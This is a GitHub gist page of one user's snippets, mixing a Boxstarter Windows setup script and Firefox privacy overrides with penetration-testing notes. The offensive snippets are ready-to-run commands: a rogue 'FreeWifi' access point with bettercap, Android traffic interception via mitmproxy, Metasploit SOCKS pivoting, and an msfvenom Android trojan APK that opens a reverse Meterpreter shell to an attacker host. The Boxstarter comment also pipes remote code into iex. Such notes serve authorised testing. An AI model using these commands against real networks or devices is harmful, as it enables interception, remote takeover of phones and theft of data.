Skip to content

Instantly share code, notes, and snippets.

Z2lub2dpbm8=
@castexyz
castexyz / BoxstarterDevFull.ps1
Last active February 23, 2024 12:51 — forked from timmes/BoxstarterDevFull.ps1
configure a brand new Windows system.
# Description: Boxstarter Script for Developer Machines
#
# To run this script, you first have to install boxstarter using the following command (NOTE the "." below is required):
# . { iwr -useb http://boxstarter.org/bootstrapper.ps1 } | iex; get-boxstarter -Force
# Learn more: http://boxstarter.org/Learn/WebLauncher
#
# Run this BoxstarterDevFull.ps1 script by calling the following from **elevated** powershell:
# example: Install-BoxstarterPackage -PackageName https://gist.githubusercontent.com/castexyz/3f2c2c7c368141db0b480edc82fb0f75/raw/f9633684d23b3d40352489e85647c75154ca12bb/BoxstarterDevFull.ps1
Update-ExecutionPolicy -Policy RemoteSigned
@castexyz
castexyz / user-overrides.js
Created November 3, 2021 10:43
Arkenfox personal overrides
/* override recipe: enable session restore ***/
user_pref("browser.startup.page", 3); // 0102
// user_pref("browser.privatebrowsing.autostart", false); // 0110 required if you had it set as true
// user_pref("places.history.enabled", true); // 0862 required if you had it set as false
// user_pref("browser.sessionstore.privacy_level", 0); // 1003 optional [to restore cookies/formdata]
user_pref("privacy.clearOnShutdown.history", false); // 2803
// user_pref("privacy.clearOnShutdown.cookies", false); // 2803 optional
// user_pref("privacy.clearOnShutdown.formdata", false); // 2803 optional
user_pref("privacy.cpd.history", false); // 2804 to match when you use Ctrl-Shift-Del
// user_pref("privacy.cpd.cookies", false); // 2804 optional
@castexyz
castexyz / rogue.txt
Created April 6, 2020 12:47
ROGUE AP
sudo apt-get install haveged hostapd git util-linux procps iproute2 iw dnsmasq iptables bettercap
git clone https://github.com/oblique/create_ap
cd create_ap
sudo make install
sudo systemctl stop NetworkManager
Create AP (create_ap <wifi-interface> [<interface-with-internet>] [<access-point-name> [<passphrase>]])
sudo create_ap wlan1 eth0 FreeWifi
@castexyz
castexyz / mitm_android
Created January 17, 2020 09:50
mitmproxy android
2. On the kali machine install/upgrade mitmproxy with “pip3 install mitmproxy” / “pip3 install –upgrade mitmproxy”
3. On the kali machine launch mitmproxy with “mitmproxy” command
4. On the mobile device configure ProxyDroid to use mitmproxy port (8080) and host
5. On the mobile device open http://mitm.it/cert/pem in the browser and download
6. Install the downloaded certificate
7. On the Kali launch Burp and setup the proxy in order to listen into localhost:8082
8. Run mitmproxy with upstream option “mitmproxy --mode upstream:http://127.0.0.1:8082 --ssl-insecure”
@castexyz
castexyz / meta_proxy
Created November 14, 2019 14:30
Metasploit proxy
run autoroute -s 192.168.0.1/24 (inside meterpreter session)
OR
route add 192.168.0.0 255.255.255.0 1
use auxiliary/server/socks4a
set SRVHOST 0.0.0.0
set srvport 1080
exploit -y
@castexyz
castexyz / grep.sh
Created November 14, 2019 14:22 — forked from isyufu/grep.sh
grep cheat sheet
#!/bin/sh
#http://www.thegeekstuff.com/2011/01/advanced-regular-expressions-in-grep-command-with-10-examples-%E2%80%93-part-ii/
# GENERAL
# print lines begining with range of letters
grep ^[A-D] table.txt
# REGEX
@castexyz
castexyz / metasploit_android
Created November 14, 2019 14:21
Trojan android
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.6 LPORT=4444 -o msf.apk
msfconsole -qx "use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set ExitOnSession false; exploit -j -z"
adb install msf.apk
adb shell am start -n com.metasploit.stage/.MainActivity
@castexyz
castexyz / string
Last active November 14, 2019 14:06
find strings
Windows
find string ignoring case (/i) on current folder and subfolders (/S) with specific file extension
findstr /i "<string>" *.<file extension>
dir /s /b >all-files.txt
findstr "\.db \.sqlitedb \.sqlite3 \.sqlite \.storedata \.store \.sql \.kcr" all-files.txt > all-databases.txt
@castexyz
castexyz / drozer.md
Last active November 5, 2024 10:33
Drozer commands
  • Drozer - Drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.
    • Starting a session
      • adb forward tcp:31415 tcp:31415
      • drozer console connect
      • drozer console connect --server <ip>
    • List modules
      • ls
      • ls activity
    • Retrieving package information
  • run app.package.list -f